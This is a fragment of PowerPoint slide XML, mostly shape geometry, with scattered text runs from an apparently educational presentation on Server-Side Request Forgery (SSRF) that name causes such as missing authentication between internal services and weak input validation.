            <a:ext cx="10507345" cy="1369060"/>
            <a:chOff x="3614737" y="3765613"/>
            <a:chExt cx="10507345" cy="1369060"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3619500" y="3770376"/>
              <a:ext cx="10497820" cy="1359535"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10497819" h="1359535">
                  <a:moveTo>
                    <a:pt x="10270744" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="226567" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180916" y="4604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138392" y="17809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99907" y="38703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66373" y="66373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38703" y="99907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17809" y="138392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4604" y="180916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="226568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1132839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4604" y="1178491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17809" y="1221015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38703" y="1259500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66373" y="1293034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99907" y="1320704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138392" y="1341598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180916" y="1354803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226567" y="1359408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10270744" y="1359408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10316395" y="1354803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10358919" y="1341598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10397404" y="1320704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10430938" y="1293034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10458608" y="1259500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10479502" y="1221015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10492707" y="1178491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10497312" y="1132839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10497312" y="226568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10492707" y="180916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10479502" y="138392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10458608" y="99907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10430938" y="66373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10397404" y="38703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10358919" y="17809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10316395" y="4604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10270744" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F8DE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619500" y="3770376"/>
              <a:ext cx="10497820" cy="1359535"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10497819" h="1359535">
                  <a:moveTo>
                    <a:pt x="0" y="226568"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4604" y="180916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17809" y="138392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38703" y="99907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66373" y="66373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99907" y="38703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138392" y="17809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180916" y="4604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226567" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10270744" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10316395" y="4604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10358919" y="17809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10397404" y="38703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10430938" y="66373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10458608" y="99907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10479502" y="138392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10492707" y="180916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10497312" y="226568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10497312" y="1132839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10492707" y="1178491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10479502" y="1221015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10458608" y="1259500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10430938" y="1293034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10397404" y="1320704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10358919" y="1341598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10316395" y="1354803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10270744" y="1359408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226567" y="1359408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180916" y="1354803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138392" y="1341598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99907" y="1320704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66373" y="1293034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38703" y="1259500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17809" y="1221015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4604" y="1178491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1132839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="226568"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="F8DEC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4330953" y="4255389"/>
            <a:ext cx="907097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SSRF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lacks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authentication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access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control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between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internal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services.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614737" y="5504497"/>
            <a:ext cx="10507345" cy="1403985"/>
            <a:chOff x="3614737" y="5504497"/>
            <a:chExt cx="10507345" cy="1403985"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3619500" y="5509259"/>
              <a:ext cx="10497820" cy="1394460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10497819" h="1394459">
                  <a:moveTo>
                    <a:pt x="10264902" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232410" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185559" y="4720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141928" y="18258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102449" y="39681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68056" y="68056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39681" y="102449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18258" y="141928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4720" y="185559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1162050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4720" y="1208900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18258" y="1252531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39681" y="1292010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68056" y="1326403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102449" y="1354778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141928" y="1376201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185559" y="1389739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232410" y="1394459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10264902" y="1394459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10311752" y="1389739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10355383" y="1376201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10394862" y="1354778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10429255" y="1326403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10457630" y="1292010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10479053" y="1252531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10492591" y="1208900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10497312" y="1162050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10497312" y="232410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10492591" y="185559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10479053" y="141928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10457630" y="102449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10429255" y="68056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10394862" y="39681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10355383" y="18258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10311752" y="4720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10264902" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F8DE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619500" y="5509259"/>
              <a:ext cx="10497820" cy="1394460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10497819" h="1394459">
                  <a:moveTo>
                    <a:pt x="0" y="232410"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4720" y="185559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18258" y="141928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39681" y="102449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68056" y="68056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102449" y="39681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141928" y="18258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185559" y="4720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232410" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10264902" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10311752" y="4720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10355383" y="18258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10394862" y="39681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10429255" y="68056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10457630" y="102449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10479053" y="141928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10492591" y="185559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10497312" y="232410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10497312" y="1162050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10492591" y="1208900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10479053" y="1252531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10457630" y="1292010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10429255" y="1326403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10394862" y="1354778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10355383" y="1376201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10311752" y="1389739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10264902" y="1394459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232410" y="1394459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185559" y="1389739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141928" y="1376201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102449" y="1354778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68056" y="1326403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39681" y="1292010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18258" y="1252531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4720" y="1208900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1162050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232410"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="F8DEC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4910454" y="6011417"/>
            <a:ext cx="791337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SSRF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has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weak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input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validation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faults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request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parsing.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44039" y="3601211"/>
            <a:ext cx="1697736" cy="169773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17192" y="5394959"/>
            <a:ext cx="1549908" cy="162305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29147" y="306451"/>
            <a:ext cx="499935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">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forgery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3920" y="760476"/>
            <a:ext cx="6839711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12085" y="1933193"/>
            <a:ext cx="122326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SSRF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encompasses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very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wide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range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potential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exploits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targets.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Some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which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include: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282184" y="3369564"/>
            <a:ext cx="5241290" cy="4005579"/>
            <a:chOff x="5282184" y="3369564"/>
            <a:chExt cx="5241290" cy="4005579"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6176772" y="3569716"/>
              <a:ext cx="3499485" cy="3492500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="1987188" y="3479800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1511915" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1558725" y="3492500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1940378" y="3492500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1987188" y="3479800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="2170349" y="3441700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1328754" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465496" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033607" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170349" y="3441700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="2079618" y="25400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1419485" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1373899" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110228" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068079" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026488" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985470" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945043" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905223" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866027" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827471" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789571" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752346" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715810" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679981" y="355600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644875" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610509" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576900" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544063" y="482600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512016" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480775" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450357" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420778" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392055" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364204" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337242" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311186" y="749300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286053" y="787400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261858" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238618" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216351" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195072" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174798" y="977900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155546" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137332" y="1066800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120173" y="1104900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104086" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89086" y="1193800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75192" y="1231900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62418" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50783" y="1320800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40301" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30991" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22868" y="1460500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15950" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10252" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5791" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2585" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2585" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5791" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10252" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15950" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22868" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30991" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40301" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50783" y="2171700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62418" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75192" y="2260600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89086" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104086" y="2349499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120173" y="2387599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137332" y="2425699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155546" y="2476499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174798" y="2514599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195072" y="2552699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216351" y="2590799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238618" y="2628899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261858" y="2666999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286053" y="2705099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311186" y="2743199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337242" y="2781299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364204" y="2819399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392055" y="2857499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420778" y="2882899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450357" y="2920999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480775" y="2959099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512016" y="2984499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544063" y="3022599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576900" y="3047999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610509" y="3073399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644875" y="3111499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679981" y="3136899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715810" y="3162299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752346" y="3187699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789571" y="3213099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827471" y="3238499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866027" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905223" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985470" y="3327400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026488" y="3340100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068079" y="3365500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196132" y="3403600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239854" y="3429000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284067" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215036" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2259249" y="3429000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2302971" y="3403600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2431024" y="3365500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2472615" y="3340100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2513633" y="3327400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654148" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607011" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560278" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513971" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1468111" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246269" y="3200399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161412" y="3174999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1119899" y="3149599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079027" y="3136899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038815" y="3111499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999286" y="3086099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960460" y="3073399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922360" y="3047999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885006" y="3022599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848420" y="2997199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812623" y="2971799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777637" y="2946399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743482" y="2908299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710181" y="2882899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677754" y="2857499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646224" y="2819399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615611" y="2793999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585937" y="2755899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557223" y="2717799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529490" y="2679699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502760" y="2654299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477055" y="2616199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452395" y="2578099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428802" y="2539999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406298" y="2501899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384903" y="2463799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364639" y="2412999"/>
                  </a:lnTo>
                  <a:lnTo>
